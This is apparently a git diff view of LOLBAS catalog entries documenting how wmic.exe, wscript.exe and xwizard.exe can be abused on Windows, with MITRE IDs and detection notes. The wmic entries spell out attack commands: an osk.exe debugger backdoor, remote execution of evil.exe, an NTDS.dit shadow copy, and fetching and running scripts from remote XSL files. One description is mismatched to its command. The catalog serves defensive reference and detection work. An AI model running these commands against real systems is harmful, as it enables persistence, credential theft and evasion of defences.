|     Usecase: Execute binary from wmic to evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" | ||||
|     Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. | ||||
|     Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" | ||||
|     Description: Execute evil.exe on the remote system. | ||||
|     Usecase: Execute binary on a remote system | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" | ||||
|     Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. | ||||
|     Usecase: Execute binary with scheduled task created with wmic on a remote computer | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" | ||||
|     Description: Create a volume shadow copy of NTDS.dit that can be copied. | ||||
|   - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" | ||||
|     Description: Execute a script contained in the target .XSL file hosted on a remote server. | ||||
|   - Command: wmic.exe os get /format:"MYXSLFILE.xsl" | ||||
|     Description: Executes JScript or VBScript embedded in the target XSL stylesheet. | ||||
|     Usecase: Execute binary on remote system | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" | ||||
|     Description: Create a volume shadow copy of NTDS.dit that can be copied. | ||||
|     Usecase: Execute binary on remote system | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" | ||||
|     Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. | ||||
|  | ||||
|     Usecase: Execute script from remote system | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\wbem\wmic.exe | ||||
|   - c:\windows\sysWOW64\wbem\wmic.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\wmic.exe | ||||
|   - Path: C:\Windows\SysWOW64\wmic.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Wmic getting scripts from remote system | ||||
| Resources: | ||||
|   - https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory | ||||
|   - https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html | ||||
|   - https://twitter.com/subTee/status/986234811944648707 | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|   - Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory | ||||
|   - Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html | ||||
|   - Link: https://twitter.com/subTee/status/986234811944648707 | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
| @@ -1,17 +1,27 @@ | ||||
| --- | ||||
| Name: Wscript.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Used by Windows to execute scripts | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: wscript c:\ads\file.txt:script.vbs | ||||
|     Description: Executes the .VBS script stored as an Alternate Data Stream (ADS). | ||||
|     Description: Execute script stored in an alternate data stream | ||||
|     Usecase: Execute hidden code to evade defensive counter measures | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\wscript.exe | ||||
|   - c:\windows\sysWOW64\wscript.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\wscript.exe | ||||
|   - Path: C:\Windows\SysWOW64\wscript.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Wscript.exe executing code from alternate data streams | ||||
| Resources: | ||||
|   - '?' | ||||
| Notes: Thanks to ? | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,21 +1,29 @@ | ||||
| --- | ||||
| Name: Xwizard.exe | ||||
| Description: DLL hijack, Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: xwizard.exe | ||||
|     Description: Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll. | ||||
|   - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | ||||
|     Description: Xwizard.exe running a custom class that has been added to the registry. | ||||
|     Usecase: Run a com object created in registry to evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\xwizard.exe | ||||
|   - c:\windows\sysWOW32\xwizard.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\xwizard.exe | ||||
|   - Path: C:\Windows\SysWOW64\xwizard.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ | ||||
|   - https://www.youtube.com/watch?v=LwDHX7DVHWU | ||||
|   - https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 | ||||
| Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer | ||||
|   - Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ | ||||
|   - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU | ||||
|   - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@Hexacorn' | ||||
| --- | ||||
		Reference in New Issue
	
	Block a user